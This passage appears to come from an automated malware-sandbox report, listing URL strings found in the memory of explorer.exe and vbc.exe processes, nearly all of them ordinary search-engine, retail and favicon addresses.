Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&q=
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&q=
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&q=
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&p=
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000009.00000000.2163853579.0000000004F30000.00000002.00000001.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000009.00000000.2161562073.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.web.de/favicon.ico
Source: vbc.exe, vbc.exe, 00000005.00000000.2146119933.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000006.00000000.2147303196.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000007.00000000.2148489931.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000008.00000000.2149944389.00000000000B2000.00000020.00020000.sdmp, explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/PayrollManagerDBDataSet.xsd
Source: explorer.exe, 00000009.00000000.2163213773.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000009.00000000.2163213773.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000009.00000000.2161562073.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000009.00000000.2172829427.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000009.00000002.2350071899.0000000001C70000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2163213773.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000009.00000000.2161103506.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2161562073.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000009.00000000.2163213773.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000009.00000000.2161103506.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp	String found in binary or memory: http://www.pinterest.com/casarpontocom
Source: explorer.exe, 00000009.00000000.2160663488.00000000039F4000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000009.00000000.2170312578.000000000861C000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tesco.com/favicon.ico
